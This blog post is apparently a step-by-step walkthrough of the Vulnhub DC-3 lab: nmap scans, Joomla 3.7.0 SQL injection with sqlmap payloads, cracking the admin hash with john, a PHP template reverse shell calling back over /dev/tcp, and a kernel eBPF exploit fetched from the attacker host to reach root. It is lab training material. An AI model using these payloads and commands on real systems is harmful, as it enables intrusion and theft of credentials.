

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
  <title>Vulnhub DC 3 Workthrough - M0untainShley</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"ee9387c15cc7097331ccc74141d07081","google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>M0untainShley</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                Links
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Vulnhub DC 3 Workthrough">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-10-29 21:46" pubdate>
        October 29, 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      34
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Vulnhub DC 3 Workthrough</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：October 30, 2021 am
                
              </p>
            
            <div class="markdown-body">
              <h3 id="靶场简介"><a href="#靶场简介" class="headerlink" title="靶场简介"></a>靶场简介</h3><p>DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.</p>
<p>As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.</p>
<p>Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.</p>
<p>For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.</p>
<p>For those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).</p>
<p>If that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.</p>
<h3 id="靶场获取"><a href="#靶场获取" class="headerlink" title="靶场获取"></a>靶场获取</h3><p><a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/dc-32,312/">https://www.vulnhub.com/entry/dc-32,312/</a></p>
<h3 id="获取Flag"><a href="#获取Flag" class="headerlink" title="获取Flag"></a>获取Flag</h3><h4 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h4><p>探测DC-3的IP</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ nmap -sP 192.168.199.0/24<br>...<br>Nmap scan report <span class="hljs-keyword">for</span> DC-3.lan (192.168.199.238)<br>Host is up (0.0030s latency).<br>MAC Address: 00:0C:29:D2:09:84 (VMware)<br></code></pre></td></tr></table></figure>



<p>端口扫描</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ nmap -T4 -sT -sV -sC  -O -p- 192.168.199.238<br>...<br>PORT    STATE    SERVICE VERSION<br>25/tcp  filtered smtp<br>80/tcp  open     http    Apache httpd 2.4.18 ((Ubuntu))<br>|_http-generator: Joomla! - Open Source Content Management<br>|_http-server-header: Apache/2.4.18 (Ubuntu)<br>|_http-title: Home<br>110/tcp filtered pop3<br>MAC Address: 00:0C:29:D2:09:84 (VMware)<br>Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port<br>Device <span class="hljs-built_in">type</span>: general purpose<br>Running: Linux 3.X|4.X<br>OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4<br>OS details: Linux 3.2 - 4.9<br>Network Distance: 1 hop<br></code></pre></td></tr></table></figure>



<p>可以看到目标开放了80端口，访问目标地址，<strong>可以看到Flag的提示，本次只有一个flag，需要获得root权限</strong></p>
<img src="/img/Vulnhub-DC-3过关笔记/3.png" srcset="/img/loading.gif" lazyload>



<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs bash">This time, there is only one flag, one entry point and no clues.<br><br>To get the flag, you<span class="hljs-string">&#x27;ll obviously have to gain root privileges.</span><br><span class="hljs-string"></span><br><span class="hljs-string">How you get to be root is up to you - and, obviously, the system.</span><br><span class="hljs-string"></span><br><span class="hljs-string">Good luck - and I hope you enjoy this little challenge.  :-)</span><br></code></pre></td></tr></table></figure>



<h4 id="CMS漏洞发现"><a href="#CMS漏洞发现" class="headerlink" title="CMS漏洞发现"></a>CMS漏洞发现</h4><p>开放了80端口，我们就从CMS开始下手吧</p>
<p>Google的插件Wapplalyzer发现了目标使用的Joomla CMS</p>
<img src="/img/Vulnhub-DC-3过关笔记/1.png" srcset="/img/loading.gif" lazyload>



<p>可以使用OWASP的开源项目<a target="_blank" rel="noopener" href="https://github.com/OWASP/joomscan">joomscan</a>来对目标进行一个扫描，可以发现一个关键信息，Joomla的CMS版本是3.7</p>
<p><strong>PS：当初在进行CMS版本收集的时候走了弯路，版本确定错了，后面漏洞一个也不适用，信息收集的时候还需要注意一下信息的准确性</strong></p>
<img src="/img/Vulnhub-DC-3过关笔记/2.png" srcset="/img/loading.gif" lazyload>



<p>使用searchsploit在exploit-db上找一下对应的漏洞，可以看到存在一个SQL注入漏洞</p>
<img src="/img/Vulnhub-DC-3过关笔记/4.png" srcset="/img/loading.gif" lazyload>



<p>下载一下该EXP到本地，看一下内容</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ searchsploit -m linux/<span class="hljs-built_in">local</span>/42033.txt<br><br>$ cat 42033.txt <br><span class="hljs-comment"># Exploit Title: Joomla 3.7.0 - Sql Injection</span><br><span class="hljs-comment"># Date: 05-19-2017</span><br><span class="hljs-comment"># Exploit Author: Mateus Lino</span><br><span class="hljs-comment"># Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html</span><br><span class="hljs-comment"># Vendor Homepage: https://www.joomla.org/</span><br><span class="hljs-comment"># Version: = 3.7.0</span><br><span class="hljs-comment"># Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux</span><br><span class="hljs-comment"># CVE : - CVE-2017-8917</span><br><br><br>URL Vulnerable: http://localhost/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml%27<br><br><br>Using Sqlmap: <br><br>sqlmap -u <span class="hljs-string">&quot;http://localhost/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml&quot;</span> --risk=3 --level=5 --random-agent --dbs -p list[fullordering]<br><br><br>Parameter: list[fullordering] (GET)<br>    Type: boolean-based blind<br>    Title: Boolean-based blind - Parameter replace (DUAL)<br>    Payload: option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)<br><br>    Type: error-based<br>    Title: MySQL &gt;= 5.0 error-based - Parameter replace (FLOOR)<br>    Payload: option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)<br><br>    Type: AND/OR time-based blind<br>    Title: MySQL &gt;= 5.0.12 time-based blind - Parameter replace (substraction)<br>    Payload: option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)<br></code></pre></td></tr></table></figure>



<h4 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h4><p>尝试使用一下该payload进行注入，可以看到该网站是存在注入点的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ sqlmap -u <span class="hljs-string">&quot;http://192.168.199.238/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml&quot;</span> --risk=3 --level=5 --random-agent --dbs -p list[fullordering]<br>...<br>sqlmap resumed the following injection point(s) from stored session:<br>---<br>Parameter: list[fullordering] (GET)<br>    Type: error-based<br>    Title: MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)<br>    Payload: option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=(UPDATEXML(8409,CONCAT(0x2e,0x7171707871,(SELECT (ELT(8409=8409,1))),0x716b766a71),5982))<br><br>    Type: time-based blind<br>    Title: MySQL &gt;= 5.0.12 time-based blind - Parameter replace (substraction)<br>    Payload: option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=(SELECT 8441 FROM (SELECT(SLEEP(5)))KNpF)<br>---<br>[10:03:45] [INFO] the back-end DBMS is MySQL<br>web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)<br>web application technology: Apache 2.4.18<br>back-end DBMS: MySQL &gt;= 5.1<br>[10:03:45] [INFO] fetching database names<br>[10:03:45] [INFO] resumed: <span class="hljs-string">&#x27;information_schema&#x27;</span><br>[10:03:45] [INFO] resumed: <span class="hljs-string">&#x27;joomladb&#x27;</span><br>[10:03:45] [INFO] resumed: <span class="hljs-string">&#x27;mysql&#x27;</span><br>[10:03:45] [INFO] resumed: <span class="hljs-string">&#x27;performance_schema&#x27;</span><br>[10:03:45] [INFO] resumed: <span class="hljs-string">&#x27;sys&#x27;</span><br>available databases [5]:<br>[*] information_schema<br>[*] joomladb<br>[*] mysql<br>[*] performance_schema<br>[*] sys<br></code></pre></td></tr></table></figure>



<p>爆字段</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ sqlmap -u <span class="hljs-string">&quot;http://192.168.199.238/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml&quot;</span> --risk=3 --level=5 --random-agent --dbs -p list[fullordering]  -D joomladb -T <span class="hljs-string">&quot;#__users&quot;</span> -C id,username,password --dump<br>...<br>[10:05:25] [INFO] fetching entries of column(s) <span class="hljs-string">&#x27;id,password,username&#x27;</span> <span class="hljs-keyword">for</span> table <span class="hljs-string">&#x27;#__users&#x27;</span> <span class="hljs-keyword">in</span> database <span class="hljs-string">&#x27;joomladb&#x27;</span><br>[10:05:25] [INFO] resumed: <span class="hljs-string">&#x27;629&#x27;</span><br>[10:05:25] [INFO] resumed: <span class="hljs-string">&#x27;$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu&#x27;</span><br>[10:05:25] [INFO] resumed: <span class="hljs-string">&#x27;admin&#x27;</span><br>Database: joomladb<br>Table: <span class="hljs-comment">#__users</span><br>[1 entry]<br>+-----+----------+--------------------------------------------------------------+<br>| id  | username | password                                                     |<br>+-----+----------+--------------------------------------------------------------+<br>| 629 | admin    | $2y$10<span class="hljs-variable">$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu</span> |<br>+-----+----------+--------------------------------------------------------------+<br>...<br></code></pre></td></tr></table></figure>



<p>使用kali自带的john工具解密密码字段，可以解出来密码：snoopy</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ vim pass.txt<br>$ cat pass.txt <br>$2y$10<span class="hljs-variable">$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu</span><br>$ sudo john pass.txt<br>Created directory: /root/.john<br>Using default input encoding: UTF-8<br>Loaded 1 password <span class="hljs-built_in">hash</span> (bcrypt [Blowfish 32/64 X3])<br>Cost 1 (iteration count) is 1024 <span class="hljs-keyword">for</span> all loaded hashes<br>Will run 4 OpenMP threads<br>Proceeding with single, rules:Single<br>Press <span class="hljs-string">&#x27;q&#x27;</span> or Ctrl-C to abort, almost any other key <span class="hljs-keyword">for</span> status<br>Almost <span class="hljs-keyword">done</span>: Processing the remaining buffered candidate passwords, <span class="hljs-keyword">if</span> any.<br>Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist<br>snoopy           (?)   <span class="hljs-comment"># 密码</span><br>1g 0:00:00:00 DONE 2/3 (2021-10-29 10:07) 3.846g/s 138.4p/s 138.4c/s 138.4C/s 123456..buster<br>Use the <span class="hljs-string">&quot;--show&quot;</span> option to display all of the cracked passwords reliably<br>Session completed<br></code></pre></td></tr></table></figure>



<h4 id="Getshell"><a href="#Getshell" class="headerlink" title="Getshell"></a>Getshell</h4><p>登录后台，后台地址 <a target="_blank" rel="noopener" href="http://192.168.199.238/administrator/">http://192.168.199.238/administrator/</a> </p>
<p>接下来，我们在tempalte添加新文件shell.php，在其中写入反弹shell的代码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">&lt;?php<br>system(<span class="hljs-string">&quot;bash -c &#x27;bash -i &gt;&amp; /dev/tcp/192.168.199.146/4141 0&gt;&amp;1&#x27; &quot;</span>);<br>?&gt; <br></code></pre></td></tr></table></figure>



<p>点击左侧的”Templates”，进入模板界面</p>
<img src="/img/Vulnhub-DC-3过关笔记/5.png" srcset="/img/loading.gif" lazyload>

<p>点击”Template”下的”Beez3”</p>
<img src="/img/Vulnhub-DC-3过关笔记/6.png" srcset="/img/loading.gif" lazyload>

<p>点击”New File”创建shell.php，用来反弹shell</p>
<img src="/img/Vulnhub-DC-3过关笔记/7.png" srcset="/img/loading.gif" lazyload>

<p>创建shell.php文件后点击”Create”</p>
<img src="/img/Vulnhub-DC-3过关笔记/8.png" srcset="/img/loading.gif" lazyload>

<p>写入反弹shell的脚本，点击左上角的”Save”</p>
<img src="/img/Vulnhub-DC-3过关笔记/9.png" srcset="/img/loading.gif" lazyload>



<p>kali上进行监听</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ nc -lvvp 4141     <br>listening on [any] 4141 ...<br></code></pre></td></tr></table></figure>



<p>访问<a target="_blank" rel="noopener" href="http://192.168.199.238/templates/beez3/shell.php">http://192.168.199.238/templates/beez3/shell.php</a> ，kali上线一个shell</p>
<img src="/img/Vulnhub-DC-3过关笔记/10.png" srcset="/img/loading.gif" lazyload>



<h4 id="内核漏洞提权"><a href="#内核漏洞提权" class="headerlink" title="内核漏洞提权"></a>内核漏洞提权</h4><p>提示说需要提权到root，我们试试看能不能使用SUID进行提取</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ sudo -l<br>sudo -l<br>sudo: no tty present and no askpass program specified<br>$ find / -user -perm -4000 -<span class="hljs-built_in">print</span> 2&gt;/dev/null<br>&lt;/templates/beez3$ find / -user -perm -4000 -<span class="hljs-built_in">print</span> 2&gt;/dev/null<br></code></pre></td></tr></table></figure>



<p>当前用户没有能以root权限执行的命令，那么我们可以换一下思路，在exploit-db上看看能不能找到当前系统内核提权的EXP，经过尝试，有一个漏洞是可以使用的</p>
<img src="/img/Vulnhub-DC-3过关笔记/11.png" srcset="/img/loading.gif" lazyload>



<p>下载说明文档到本地，查看EXP相关信息</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ searchsploit -m linux/<span class="hljs-built_in">local</span>/39772.txt<br>$ cat 39772.txt<br>...<br>Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip<br></code></pre></td></tr></table></figure>



<p>下载EXP到本地，使用python搭建一个简单的服务器供远程主机进行下载</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 国外的地址，挂一下代理</span><br>$ proxychains wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip<br><br><span class="hljs-comment"># python本地启动服务器（Kali：92.168.199.146）</span><br>$ python -m SimpleHTTPServer 8888<br>Serving HTTP on 0.0.0.0 port 8888 ...<br></code></pre></td></tr></table></figure>



<p>使用反弹到的shell到Kali主机上下载该文件，进行内核漏洞提权</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ wget http://192.168.199.146:8888/39772.zip  <span class="hljs-comment"># 从Kali上下载文件</span><br>$ unzip 39772.zip  <span class="hljs-comment"># 解压 文件</span><br>$ <span class="hljs-built_in">cd</span> 39772<br>$ ls<br>ls<br>crasher.tar<br>exploit.tar<br>$ tar -xvf exploit.tar  <span class="hljs-comment"># 解包</span><br>tar -xvf exploit.tar<br>ebpf_mapfd_doubleput_exploit/<br>ebpf_mapfd_doubleput_exploit/hello.c<br>ebpf_mapfd_doubleput_exploit/suidhelper.c<br>ebpf_mapfd_doubleput_exploit/compile.sh<br>ebpf_mapfd_doubleput_exploit/doubleput.c<br>$ <span class="hljs-built_in">cd</span> ebpf_mapfd_doubleput_exploit<br>$ ls   <br>ls<br>compile.sh<br>doubleput.c<br>hello.c<br>suidhelper.c<br>$ ./compile.sh  <span class="hljs-comment"># 执行编译脚本</span><br>$ ls  <span class="hljs-comment"># 编译后出现了doubleput文件</span><br>ls<br>compile.sh<br>doubleput<br>doubleput.c<br>hello<br>hello.c<br>suidhelper<br>suidhelper.c<br>$ ./doubleput  <span class="hljs-comment"># 提权</span><br>./doubleput<br>starting writev<br>woohoo, got pointer reuse<br>writev returned successfully. <span class="hljs-keyword">if</span> this worked, you<span class="hljs-string">&#x27;ll have a root shell in &lt;=60 seconds.</span><br><span class="hljs-string">suid file detected, launching rootshell...</span><br><span class="hljs-string">we have root privs now...</span><br><span class="hljs-string">id  # 当前权限</span><br><span class="hljs-string">uid=0(root) gid=0(root) groups=0(root),33(www-data)</span><br><span class="hljs-string">ls /root  # 查看root家目录，发现flag</span><br><span class="hljs-string">the-flag.txt</span><br><span class="hljs-string">cat /root/the-flag.txt  # 查看flag</span><br><span class="hljs-string"> __        __   _ _   ____                   _ _ _ _ </span><br><span class="hljs-string"> \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |</span><br><span class="hljs-string">  \ \ /\ / / _ \ | | | | | |/ _ \| &#x27;</span>_ \ / _ \ | | | |<br>   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|<br>    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)<br>                                                     <br><br>Congratulations are <span class="hljs-keyword">in</span> order.  :-)<br><br>I hope you<span class="hljs-string">&#x27;ve enjoyed this challenge as I enjoyed making it.</span><br><span class="hljs-string"></span><br><span class="hljs-string">If there are any ways that I can improve these little challenges,</span><br><span class="hljs-string">please let me know.</span><br><span class="hljs-string"></span><br><span class="hljs-string">As per usual, comments and complaints can be sent via Twitter to @DCAU7</span><br><span class="hljs-string"></span><br><span class="hljs-string">Have a great day!!!!</span><br></code></pre></td></tr></table></figure>

<p>获取Flag</p>
<img src="/img/Vulnhub-DC-3过关笔记/12.png" srcset="/img/loading.gif" lazyload>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Vulnhub/">Vulnhub</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    转载请保留原文链接及作者
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/10/30/Vulnhub-DC-4-Workthrough/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Vulnhub DC 4 Workthrough</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/10/24/Vulnhun-DC-2-WalkThrough/">
                        <span class="hidden-mobile">Vulnhub DC 2 WalkThrough</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"87DviF4Tc6ftT198Wx2XV99q-gzGzoHsz","appKey":"wWetKPApalpJJoqj5nyGYBJl","placeholder":"说点什么","path":"window.location.pathname","avatar":"retro","meta":["nick","mail","link"],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false,"requiredFields":[]},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
